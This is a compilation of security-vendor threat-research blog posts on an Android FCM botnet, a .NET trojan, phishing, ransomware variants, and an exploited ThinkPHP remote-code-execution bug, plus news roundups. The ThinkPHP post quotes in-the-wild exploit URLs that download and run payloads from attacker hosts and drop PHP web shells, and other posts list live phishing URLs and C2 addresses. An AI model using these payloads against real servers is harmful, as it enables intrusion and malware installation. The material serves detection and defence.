The Android Zazdi botnet uses FCM to communicate with its infected bots

/in /by

SonicWall Capture Labs Threat Research team received reports of an info-stealer for Android, upon inspecting related samples and correlating different data points we discovered this to be a botnet campaign. This botnet campaign is capable of executing 50 commands on the infected devices using Firebase Cloud Messaging (FCM) as a means to communicate with the infected devices.

We named this botnet Zazdi due to a form on the server-side containing this word as its id and another sample that contained the string zazdihicham in reverse.

Infection Cycle:
We identified a Facebook page – hxxps://www.facebook.com/HizaxyTV –  that contains links to websites that host a malicious Android app belonging to this campaign (The link is active at the time of writing this blog):

We identified 2 more such Facebook pages:

  • hxxps://www.facebook.com/windows7emulator – This has been removed
  • hxxps://www.facebook.com/Windows7Simulator – Links on this page do not work at the moment

Visiting either of the highlighted links led us to a download page for the apk file:

We have shown analysis of a different app belonging to this campaign  – Win7Launcher – to highlight a number of operations for this blog, however the malicious functionality and motives of the all the apps belonging to this campaign are the same.

Upon installation and execution, the app worked as advertised – it actually is a Windows 7 themed launcher:

But soon enough it started malicious activity in the background, we see a network capture of the device registering itself with the attacker’s server indicating successful infection. Along with this the malware sends device sensitive information to the server:

  • User email
  • Device manufacturer and model name
  • OS version
  • Location – sent to a specific php page ending in register_location.php 

We saw an interesting variable in the network packet – clipboard – we tested by copying the string “testing clipboard” and the subsequent network packet contained this string captured from our clipboard and sent to the server at a specific page ending in register_clipboard.php:

Soon enough we started seeing shortcuts on our infected device which when clicked led us to other malicious apps belonging to this botnet campaign:

Holes in server-side security:
During our investigation we observed that the C&C server lacked adequate security which allowed us to access web-pages that revealed critical data related to this botnet campaign. Below are few highlights of our findings:

There are multiple directories on the server based on app names, using these names we could list the different apps that are part of this botnet campaign:

  • Happy Bird Pro (com.hzdi.happybird)
  • Epic Bird (com.hzdi.epicfloppybird)
  • Win7Launcher (com.mobistartapp.windows7launcher)
  • Flappy Bee (com.hzdi.flappybee)
  • Win7imulator (com.ketchupmobile.win7imulator)
  • FlashLight (com.mobistartapp.flashlight)
  • Desktop WLauncher (com.mobistartapp.desktopwlauncher)
  • Hizaxy TV (com.mobistartapp.livetv)
  • HZPermis Pro Arabe (com.mobistartapp.coderoute.hzpermispro.ar)

Interestingly the apps with a particular name come with the corresponding functionality. For instance Win7Launcher app has the Windows 7 launcher theme, Happy Bird Pro actually contains a bird themed game. This is not very common as malicious apps usually do not contain the functionality based on their name, they usually just execute the malicious code while appearing idle to the user.

As we mentioned earlier once the malicious app is opened on the device, the device gets registered on the server. We found a link that listed users registered via the app Happy Bird Pro. It is worth noting that the page shows 1000 registered devices:

A clearer view of this data can be seen from the source code of this page:

 

As visible, this looks like a fresh registration – 7th January, 2019.

It is interesting to note that the clipboard functionality is not present in all the apps belonging to this campaign. As visible below, few apps do not have the page related to clipboard data:

Topics and Firebase Cloud Messaging:
This botnet campaign uses Firebase Cloud Messaging (FCM) to communicate with the apps that have registered after they have infected the devices. FCM allows creators to send messages to apps that have opted-in to a particular topic providing easy means to send relevant messages to a group of users. For instance users of a movie app can subscribe to a topic “English movies” to receive alerts about English movies only.

However this can be used for malicious purposes!

During our analysis of apps belonging to this campaign, once installed most of the apps were automatically subscribed to a particular topic. One instance is as shown below where our installed app was subscribed to the topic windows7_launcher:

One of the web-pages we discovered on the server was the Firebase dashboard. Using this page an attacker could send commands to apps that are subscribed to a particular topic thereby controlling the operations that can be performed by the infected devices in the botnet. Thanks to the lax security on the server, we could do the same!

Below image shows the combo-box box to select a particular app id, we selected the id windows7_launcher as our analysis app had the functionality of Windows 7 launcher. We filled the Title input box with a test message for experimentation:

We then selected the topic that this app belonged to, as mentioned earlier our analysis app was subscribed to the topic windows7_launcher:

After filling a few more boxes we could finally test our custom alert message by sending it to devices subscribed to this topic:

Success! We received an alert message on our infected device with our custom message:

There are multiple ways in which this notification is displayed to the user, in our example we displayed it as an alert message. There is an option to display this as a Gmail notification which means the victim will see a notification that uses Gmail icon with the desired message thereby fooling the victim into believing that he received a Gmail notification. To most users this will look legitimate and they will open the notification thereby falling victim to the scam. The different options which can be used to send messages/notifications to the victim listed on the dashboard are listed below (we displayed the “code” version of the website for clarity):

Lastly there are 50 commands supported by this botnet and which can be executed via FCM:


Command Execution Examples:
We executed few commands via FCM:

Command 20 – FK FB – Fake Facebook login screen

Upon executing this command a fake Facebook login screen popped on our infected device. We entered fake credentials test@gmail.com/testpass:

Soon enough our entered credentials were sent to the server in the background:

 

Command 22 – Screenshot Current Screen – Takes the screenshot and saves it locally

We saw an alert stating that Win& Launcher will start capturing everything on the screen (not so stealthy):

The screenshot was captured and saved locally in the app folder under files as myscreenshot:

This highlights the capabilities of this botnet and how easy it is to execute commands from the dashboard and toy with the victims.

Closing Thoughts:
Overall this Botnet appears to be active at the moment based on:

  • Date of registration of devices to this campaign
  • Samples related to this campaign (latest one being January 7, 2019)
  • The active links that contain malicious apk files
  • Active Facebook campaign page 

This botnet campaign boasts of as many as 50 commands that can be executed on the infected devices in a number of different ways to make it seem legitimate. Apart from the active Facebook page this campaign can spread to other devices using these commands on the infected devices.

We urge our readers to be careful of such dangerous apps and keep an eye out on suspicious behavior (if any) on the device and take prompt action to keep yourself and your personal data safe.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOS.Zazdi.FL
  • GAV: AndroidOS.Zazdi.HTV
  • GAV: AndroidOS.Zazdi.W7
  • GAV: AndroidOS.Zazdi.W7L

The following are few samples belonging to this campaign:

  • com.mobistartapp.desktopwlauncher – 7dfb7a568fad88e7e92da2ce1ac71483
  • com.mobistartapp.windows7launcher – 1678e81602a1666d602895bf7da04af4
  • com.mobistartapp.hizaxytv.mobile – 386052ccba75e0d9e0d676be865c1f66
  • com.mobistartapp.emulator.windows7 – 01256c189d57af2536e5e26a3aa36bda
  • com.mobistartapp.flashlight – be9bf5750a8639101900b082b8c445ca
  • com.mobistartapp.hzpermisproar.s1 – bfd16f9294674712d40d03f0480b9c82
  • com.hzdi.happybird – 1de491f554dfc0186bde2225b4459474

.NET Trojan: Yubby v1.6 w/[CRM Service]…

/in /by

Overview:

SonicWall Capture Labs Threat Research team has captured and observed the following sample:

The “Yubby” Trojan is listed as a (Trojan, PUA or PUP) by many anti-virus outfits and help forums around the internet. The application establishes multiple connections to the following IP addresses (88.198.58.40) and (176.9.8.183).

An overview of the behavior (Setup.exe) is listed as:

      • Opens, Deletes, and Modifies Multiple Files.
      • Downloads, Installs, and Updates Files.
      • Opens, Creates, Modifies, and Deletes Registry Keys.
      • Creates, and Terminates Processes.
      • Installs, and Executes The “CRMSvc” Service.
      • The Packer and Protector uses complex obfuscation techniques using the xor algorithm.

SHA-256 Hash: d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e

The relationship between the sample and the IP Addresses above can been seen as follows:

Sample Static Information:

Unpacking The Sample:

A quick look at the resource section of the sample. We see the famous, “BEEFCACE”. Many kewords like this are used to pinpoint areas in memory. We also see that there is a PE File in the resource section by noticing the “MZ” signature a few lines down from “BEEFCACE”.

The main function starts out with a lot of xor’ing bytes and shifting of pointers. You can see the first of many decryption functions below:

Unfortunately, this is only 1 of about 200 other decryption functions like this you have to step through in order to get to dump the array[]. After stepping through the starting function and others that follow you will arrive at the location you can dump the array:

Once the sample’s resource has been decrypted, you will see the installed location here:

CRMSvc.exe, Static Information:

The CRM Service .EXE is also a .NET PE File.

Registry Details

  • “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D105DFE2-8DF6-4BA0-ABF1-392716658963}”

This one registry key gives us a lot of information about the sample:

  • The Display Name
  • Display Version
  • Estimated Size of File
  • Installation Location
  • Publisher
  • Uninstall parameters of the Trojan.

HTTP Network Objects

[Network Object 1]:

[Network Object 2]:

SonicWall Gateway AntiVirus, provides protection against this threat:

  • GAV: Gdsda.A ( Trojan )

American Express Phishing Campaign making rounds

/in /by

SonicWall Capture Labs Threat Research team has observed a new variant of the American Express phishing campaign.  It starts with a phishing email pretending to come from American Express Fraud protection services. It then requests user to download the attached PDF document to verify the account information.  Phishing link in the PDF document takes user to the attacker web page that looks exactly like American express. In the last week’s phishing campaign, html form was used instead of a phishing web page.

Even though the email address in these phishing campaign is not from American express, it  just says American Express. The original email id is from the domain “Americ@centralcomwireless.com”. Email’s subject says “Urgent: Request for information” with the attached PDF payload “Secure Document.pdf”

Snapshot of the attached PDF is shown below, it requests the user to click on the phishing URL to verify the account activity.

“Click here” goes to “hxxp://tresriosimoveis.com.br/quemsomos/index.html” initially and later get redirected to the phishing web page.  Looks like “tresriosimoveis.com.br” has been compromised by attackers and used for redirection.

Index.html has the content pasted below, that redirects to the specified url. Also URL seems to be updated by the attacker as we see them getting changed.

meta http-equiv=”Refresh” content=”0; url=https://plantsok.ga/infox/index.html”

The redirected https url is a fake site that impersonates American Express. None of the links in this page work except for ‘Log In’.

Upon entering the account credential, it takes us to the next page requesting for 4-digit card identification number and 3 digit card security code.

In the final page, it requests to update personal information such as Social Security Number, Security PIN, Mother’s maiden name, Mother’s Birthday, Place of Birth, First elementary school, Email address and Mobile Phone Number.

When done stealing the personal information, it responds back with the message “Thank you, your information has been verified.” to look legitimate.

Finally, it lands on the legitimate American express web page

 

SonicWall Capture Advanced Threat Protection (ATP) provides protection against the most phishing documents with its multi-engine approach.

Hashes:

PDF: 043459c13f1a4873db3396faf9f15ecc51bab083041c14d8a57f92859309c5f6
Email: 0b18455494f9b85aeaf0e08e6ec672ff490bc292f761a019c83f207b8d11bf26

Phishing URL’s:

Both the given phishing urls are active at the time of writing.

  • hxxps://entially.ga/infox/indxp.html?sign&accountx/Appli-catitup/Applion$updatenow=&cookiegtcheck/yes&destkcnpage&fefdd
  • hxxps://plantsok.ga/infox/indxp.html?sign&accountx/Appli-catitup/Applion$updatenow=&cookiegtcheck/yes&destkcnpage&fefdd

Recognizing Phishing Emails:

Phishing emails look like legitimate company emails and are designed to steal your information. They usually contain a link to a website that will ask for your login credentials, personal information or financial details. These websites are clever fakes designed to take your information and pass it back to the cybercrooks behind the scam.

In general, if you are not expecting an email from that company, you should be suspicious. Other tell-tale signs of phishing emails are as follows:

  • The email is not addressed to your full name. It will use generic terms like “Dear Customer.”
  • The email contains grammatical or spelling errors.
  • The email asks for personal information.
  • The email contains urgent or threatening language.

If you think you have received a phishing email, do not click on any links or open any attachments. To be sure, log directly into your relevant account to check for updates or messages or contact the company directly through their website.

Take our Phishing Quiz to see if you are able to identify phishing emails.

ShellLocker ransomware variant actively promoting PewDiePie YouTube channel

/in /by

The SonicWall Capture Labs Threat Research Team have recently observed an unusual form of ransomware based on ShellLocker source code.  Although this variant does do damage to its victim and contains the usual cryptographic capabilities expected in ransomware it appears that its sole purpose is to promote PewDiePie’s YouTube channel.

Infection Cycle:

Upon infection it displays the following full screen page:

The YouTube link leads to the following page asking the victim to subscribe to PewDiePie’s YouTube channel:

 

It makes a DNS request to i.imgur.com and makes the following request to download an image:

 

However, the image is not displayed.

The Trojan adds the following files to the filesystem:

  • %APPDATA%\Local\TempTqykUo3.png (image downloaded from imgur.com)
  • %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe (Detected as: [GAV: PewDiePie.RSM (Trojan)])

It deletes the following directories:

  • C:\Documents and Settings
  • C:\ProgramData\Application Data
  • C:\ProgramData\Desktop
  • C:\ProgramData\Documents
  • C:\ProgramData\Microsoft\Diagnosis\FeedbackHub
  • C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA
  • C:\ProgramData\Microsoft\Windows\SystemData
  • C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cache
  • C:\ProgramData\Start Menu
  • C:\ProgramData\Templates
  • C:\System Volume Information
  • C:\Users\All Users\Application Data
  • C:\Users\All Users\Desktop
  • C:\Users\All Users\Documents
  • C:\Users\All Users\Microsoft\Diagnosis\FeedbackHub
  • C:\Users\All Users\Microsoft\Diagnosis\TenantStorage\P-ARIA
  • C:\Users\All Users\Microsoft\Windows\SystemData
  • C:\Users\All Users\Microsoft\Windows Defender Advanced Threat Protection\Cache
  • C:\Users\All Users\Start Menu
  • C:\Users\All Users\Templates
  • C:\Users\Default\AppData\Local\Application Data
  • C:\Users\Default\AppData\Local\History
  • C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files
  • C:\Users\Default\AppData\Local\Temporary Internet Files
  • C:\Users\Default\Application Data
  • C:\Users\Default\Cookies
  • C:\Users\Default\Documents\My Music
  • C:\Users\Default\Documents\My Pictures
  • C:\Users\Default\Documents\My Videos
  • C:\Users\Default\Local Settings
  • C:\Users\Default\My Documents
  • C:\Users\Default\NetHood
  • C:\Users\Default\PrintHood
  • C:\Users\Default\Recent
  • C:\Users\Default\SendTo
  • C:\Users\Default\Start Menu
  • C:\Users\Default\Templates
  • C:\Users\Default User
  • C:\Users\\AppData\Local\Application Data
  • C:\Users\\AppData\Local\History
  • C:\Users\\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
  • C:\Users\\AppData\Local\Microsoft\Windows\Temporary Internet Files
  • C:\Users\\AppData\Local\Temporary Internet Files
  • C:\Users\\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles
  • C:\Users\\Application Data
  • C:\Users\\Cookies
  • C:\Users\\Documents\My Music
  • C:\Users\\Documents\My Pictures
  • C:\Users\\Documents\My Videos
  • C:\Users\\Local Settings
  • C:\Users\\My Documents
  • C:\Users\\NetHood
  • C:\Users\\PrintHood
  • C:\Users\\Recent
  • C:\Users\\SendTo
  • C:\Users\\Start Menu
  • C:\Users\\Templates
  • C:\Users\Public\Documents\My Music
  • C:\Users\Public\Documents\My Pictures
  • C:\Users\Public\Documents\My Videos
  • C:\Windows\CSC
  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc
  • C:\Windows\System32\LogFiles\WMI\RtBackup

The Trojan adds the following keys to the registry:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bam\UserSettings\S-1-5-21-1139641556-554834077-2527536839-1002 \Device\HarddiskVolume2\Users\<USER>\Documents\<malware filename>.exe hex:f4,e2,99,cc,c4,a3,d4,01,00,00,00,00,00,00,00,00,00,00,00,00,02,00,00,00,
  • HKEY_USERS\S-1-5-21-1139641556-554834077-2527536839-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store C:\Users\<USER>\Documents\<malware filename>.exe

The Trojan modifies the following registry key:

  • HKEY_CURRENT_USER\Control Panel\Desktop WallPaper “C:\Windows\web\wallpaper\Windows\img0.jpg” “C:\Users\<USER>\AppData\Local\TempTqykUo3.png”

In our run of the malware, it did not actually encrypt any files on the system.  It does however, contain the capability to do so.  The malware is written in .NET and was fairly trivial to decompile.

It contains code to kill system related processes:


There are 7 copies of the above code that kill the following processes:

  • cmd
  • taskmgr
  • procexp
  • procexp64
  • regedit
  • CCleaner64
  • msconfig

The code uses AES.generateKey() to generate a random encryption key.  It will encrypt files on all drives from A through Z:

 

The following code downloads an image from imgur.com although it fails to display the image:

A search using the text in the above image led us to the Shell Locker source code used for the malware on github:

https://github.com/gr33ntii/malware-collection/tree/master/Ransomware/Shell%20Locker%20-%20Source%20Code/ShellLocker/ShellLocker

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: PewDiePie.RSM (Trojan)

JavaScript being used to distribute GandCrab ransomware

/in /by

SonicWall RTDMI engine has recently detected a surge in archive files (~1600-8900 Bytes in size) floating in the network.

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution.

 

The archive files carries a JavaScript file.

The JavaScript file has code to download another malware with some garbage code. The JavaScript file downloads a second stage malware which on further analysis is found to be a downloader.

The second stage downloader, downloads a variant of a popular ransomware family “GandCrab”

The GANDCRAB family is known for asking ransom from the victim after file encryption.

 

Evidence of the detection by RTDMI engine can be seen below in the Capture ATP report for this file:

 

Cyber Security News & Trends – 01-04-19

/0 Comments/in /by

How long did it take before 2019’s first cyberattack took place? Find out this and more. SonicWall has collected this week’s best cybersecurity stories, just for you.

SonicWall Spotlight

SonicWall Celebrates Key EMEA Milestones  – Enterprise Channels MEA

  • SonicWall’s Michael Berg comments on SonicWall’s boosted presence in EMEA, crediting channel expertise and commitment to speaking the local language as key factors in growth.

Ransomware Attacks Hit Legal System – Today’s General Counsel Magazine

  • An investigation into the growing threat of ransomware in the legal world uses SonicWall 2018 data as its jumping off point.

Cyber Security News

The Elite Intel Team Still Fighting Meltdown and Spectre – Wired

  • The Spectre and Meltdown vulnerabilities were first announced a year ago and made major waves in the news cycle due to their scope and impact. Wired follow up on the story with an in-depth look at how STORM, Intel’s strategic offensive research and mitigation hacker group, have been dealing with the problem.

Town of Salem Breach Affects 7 Million Accounts – SC Magazine

  • Some payment information was exposed in the breach, but the main leak was of usernames, email addresses, hashed passwords, IP addresses, game and forum activity. The developers have stressed that no card numbers were leaked.

What We Still Don’t Know About the Cyberattack on Tribune Newspapers – Washington Post

  • A cyberattack seriously hampered printing several papers owned by Tribune Publishing, including The L.A. Times. While the Tribune group say they suspect the cyberattack originated from abroad, they have given little other information and the identity and motive of attackers remain unclear.

Dublin’s Luas Tram System Threatened With Private Data Leak – ZDNet

  • Dublin’s tram system is hit with what looks like a ransomware attack that threatens to expose online users unless a ransom of one bitcoin is paid.

Your Data Was Probably Stolen in Cyberattack in 2018 – and You Should Care – USA Today

  • Marriott, Quora, Facebook, Dunkin’ Donuts; USA today summarize the biggest hacks of 2018 and come to the conclusion that very few people have escaped unscathed.

German Politicians Targeted in Mass Data Attack  – BBC

  • Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published on Twitter throughout December. No one has publicly taken responsibility for the attack yet but all parties except those on the far right were affected.

This Data-Stealing Android Malware Infiltrated the Google Play Store, Infecting Users in 196 Countries – ZDNet

  • When an App is first uploaded into the Google Play Store it is subject to tough reviews to ensure it is safe for users, but some malware developers have been taking advantage of less stringent checks later down the line and injecting malware as an update.

2019’s First Data Breach: It Took Less than 24 Hours – CBR Online

  • The first data breach of 2019 was reported less than 24 hours into the New Year when an estimated 30,000 Australian civil servants had work emails, phone numbers and job titles leaked. Thankfully, no financial information is said to have been affected.

In Case You Missed It

ThinkPHP Remote Code Execution (RCE) bug is actively being exploited

/in /by
ThinkPHP is a web application development framework based on PHP, distributed under the Apache2 open-source license. It focuses on rapid development of enterprise projects and is very popular in China where over 40,000 servers run ThinkPHP.

Vulnerability Overview:

ThinkPHP has recently released a security update to fix an unauthenticated high risk remote code execution(RCE) vulnerability. This is due to insufficient validation of the controller name passed in the url, leading to possible getshell vulnerability without the forced routing option enabled.

ThinkPHP parses the url query parameters to retrieve the module, controller and the function. It then checks to see if there exists a class for the the controller name. If so, it instantiates an object of this class and executes the function passed in the url.

The url query given below gets parsed by using the separator character ‘/’. Ideally controller class should not take ‘\’ in the name. Because of the existing bug, ‘\think\app’ is parsed as controller class name and ‘invokefunction’ as the function. It then creates an instance of the controller class ‘App’ within ‘think’ and then calls the method ‘invokefunction’. ‘invokefunction’ can take arbitrary function as its argument, allowing threat actors to perform remote code execution.


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

The same vulnerability allows remote code execution through another controller class ‘Request’ in ThinkPHP.  Request class can be instantiated with the url below allowing cache function to execute the arbitrary function provided as part of the url query.


?s=index/\think\request/cache&key=1|phpinfo

This is due to framework’s insufficient validation on the controller name, allowing arbitrary remote code execution or even access to the server

ThinkPHP has fixed the vulnerability by having additional checks using regular expression.


Exploit Campaign:

SonicWall Threat Research Lab has observed various attempts to exploit the recently disclosed ThinkPHP RCE vulnerability. It seems to be adopted by threat actors immediately after public disclosure. This vulnerability is currently being exploited by different threat groups to install botnets and other malicious code on the servers running vulnerable versions of ThinkPHP.

Find below some of the URL’s trying to exploit the ThinkPHP RCE vulnerability

    1. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://cnc.arm7plz.xyz/bins/set.x86 -O /tmp/.eSeAlg; chmod 777 /tmp/.eSeAlg; /tmp/.eSeAlg thinkphp
    2. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'<?php eval($_POST[qazw]);?>’ > result.php
    3. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r ‘print(“tj”.” tj”);
    4. index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://a46.bulehero.in/download.exe’,’C:/12.exe’);start C:/12.exe
    5. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 46.30.43.159:81/zz
    6. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
    7. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 176.32.33.124/zzta
    8. index.php?s=index/\think\app/invokefunction&function=assert&vars[0]=${@print(eval(phpinfo().fputs(fopen(‘lx.php’,’w’), Base64_decode(‘Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4=’))))}

Fix:

Upgrade to ThinkPHP version 5.0.23 or 5.1.31 to resolve the issue.
If you use a content management system that’s based on ThinkPHP5, It is likely affected by this vulnerability.

Vendor advisory link: https://blog.thinkphp.cn/869075

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13955 ThinkPHP Remote Code Execution
  • IPS: 13965 ThinkPHP Remote Code Execution 2
  • WAF: 1689 ThinkPHP Remote Code Execution

Cyber Security News & Trends – 12-21-18

/0 Comments/in /by

Quantum Cryptography, Malware spreading through the cloud, and Fortnite making teenagers a lot of money; SonicWall has collected and compiled this week’s best cybersecurity stories, just for you.

SonicWall Spotlight

CEO Outlook: Five Questions on 2019  – CRN.com

  • SonicWall CEO Bill Conner gives his five predictions for 2019; from the biggest market opportunities to his thoughts on why staying up-to-date will be key for Channel Partners. He also predicts that 2019 will be the year of the SonicWall Capture Cloud Platform.

SonicWall Increasing Local Partner Support Across EMEA – Computer Weekly

  • SonicWall celebrates key EMEA milestones including the hiring of industry-leading talent and the opening of three new offices in the UK, Spain, and the UAE.

Quantum Cryptography: The Next-Generation of Secure Data Transmission – Information-Age

  • With SonicWall Threat Data showing an increase in encrypted threats throughout 2018, Information Age speculate that quantum cryptography could be the future in encryption.

Cyber Security News

Public Clouds: Fertile Ground to Spread Malware – Security Boulevard

  • A general trust in cloud services is leaving an easy entry point open for threat actors to spread malware. Researchers have already found browser hijacker adware Linkury making its way across Microsoft Azure.

Hackers Have Earned $1.7 Million so Far From Trading Data Stolen From US Gov Payment Portals – ZDNet

  • Click2Gov, a US government self-service payment system owned by Superion, was hit by a data breach in September 2017. Security researchers are estimating that the hackers have earned at least $1.7 million to date selling the information on the Dark Web.

Google Finds Internet Explorer Zero-Day Exploited in Targeted Attacks – Security Week

  • Microsoft released a patch for Internet Explorer fixing a dangerous zero-day bug. SonicWall Captures Labs also issued a signature to provide protection.

Fortnite Teen Hackers ‘Earning Thousands of Pounds a Week’ – BBC

  • With Fortnite estimated to have earned more than £1 billion through selling in-game “skins” there is a growing black-market, often run both by and for very young teenagers.

Irish Data Authority Probes Facebook Photo Breach – Security Week

  • A GDPR investigation has been launched in Ireland after it was revealed that up to 6.8 million users may have had their photos exposed to third party apps. A fine of up to four percent of annual global turnover can be issued to a corporation if they are found to be in breach of GDPR.

New Malware Pulls Its Instructions From Code Hidden in Memes Posted to Twitter – Tech Crunch

  • Researchers have found a type of malware that appears to be activated by memes on Twitter. The good news for those who can’t resist a link to a laugh is that it still looks to be in a testing stage and may never be released.

NASA Discloses Data Breach – ZDNet

  • NASA confirmed a data breach in October 2018 where a third party gained access to personal data, including Social Security Numbers, of current and former employees. No missions are believed to jeopardized by the hack but the investigation into the incident will “take time.”

The Nightmare Before Christmas: Cybersecurity Risks for Children’s Toys – EURACTIV (Europe)

  • As the Internet of Things enters toy manufacturing a host of problems are coming with it; open Bluetooth connections, cheap manufacturing standards, and cybersecurity laws that cannot yet be effectively applied.

In Case You Missed It

Evolution Ransomware actively spreading in the wild.

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of Evolution Ransomware [Evolution.RSM] actively spreading in the wild.

Evolution encrypts the victims files with a strong encryption algorithm until the victim pays a fee to get them back.

Contents of the Evolution ransomware

Infection Cycle:

The Ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ (_H0W_TO_REC0VER_[Random].html
    • %App.path%\ (_H0W_TO_REC0VER_[Random].txt
    • %App.path%\ (_H0W_TO_REC0VER_[Random].lnk
    • %App.path%\ [File Name]. Random
    • %Userprofile\Desktop %\ (_H0W_TO_REC0VER_[Random].html
      • Instruction for recovery

Once the computer is compromised, the Ransomware runs the following commands:

The Ransomware encrypts all the files and appends random extension such as [.hAOrGb]  onto each encrypted file’s filename.

After encrypting all personal documents the Ransomware shows the following webpage containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Evolution.RSM (Trojan)

5 Tips to Keep You Cybersecure During Holiday Travel

/1 Comment/in /by

The holiday season is one of the busiest times of the year for travel, which means it’s also one of the most vulnerable times of the year for travelers’ belongings, including sensitive personal data.

Those looking forward to spending time away from the office and relaxing with friends and family are likely making plans to secure their belongings at home, but what about securing devices and data?

Year-to-date attack data through November 2018 shows an increase in attacks across nearly all forms of cybercrime, including increases in intrusion attempts, encrypted threats, and malware attacks.

Below are some simple ways to consider protecting your cyber assets and have peace of mind during a well-earned holiday break.

  1. Lock Devices Down
    While traveling, lock all your mobile devices (smartphones, laptops, and tablets) via fingerprint ID, facial recognition, or a PIN number. This will be the first line of defense against a security breach in the event that any of your devices have been momentarily misplaced or forgotten.
  2. Minimize Location Sharing
    We get it! You want to share the fun memories from your trip with your friends and family on social media. However, excessive sharing, especially sharing of location data, creates a security threat at home.If you’re sharing a photo on a boat or at the Eiffel Tower, it’s easy for a criminal to determine you’re not at home or in your hotel room, which leaves your personal property left behind vulnerable to theft of breach. If you must share location data, wait until after you have returned home to geotag that selfie from your trip.
  3. Bring Your Own Cords and Power Adapters
    Cyber criminals have the ability to install malware in public places such as airport kiosks and USB charging stations. If you are unable to find a secure area to charge your devices or you are unsure of the safety of the charging area, power your device down prior to plugging it in.
  4. Disable Auto-Connect
    Most phones have a setting that allows a device to automatically connect to saved or open Wi-Fi networks. This feature is convenient when used at home, but can leave your device vulnerable to threat actors accessing these features for man-in-the-middle attacks.Disable the auto-connect features on your devices and wipe saved network SSIDs from the device prior to your trip to avoid exploitation.
  5. Be Cautious of Public Wi-Fi
    Free Wi-Fi access can often be found at coffee shops and in hotel lobbies as a convenience to travelers, but unencrypted Wi-Fi networks should be avoided. Before you connect to a new Wi-Fi source, ask for information regarding the location’s protocol and if you must use a public Wi-Fi connection, be extra cautious.Use a VPN to log in to your work networks and avoid accessing personal accounts or sensitive data while connected to a public Wi-Fi source.

Cybercrime is Trending up During the Holiday Season

For the 2018 holiday shopping season, SonicWall Capture Labs threat researchers collected data over the nine-day Thanksgiving holiday shopping window and observed a staggering increase in cyberattacks, including a 432 percent increase in ransomware and a 45 percent increase in phishing attacks.

LIVE WORLDWIDE ATTACK MAP

Visit the SonicWall Security Center to see live data including attack trends, types, and volume across the world. Knowing what attacks are most likely to target your organization can help improve your security posture and provide actionable cyber threat intelligence.

Visit the SonicWall Security Center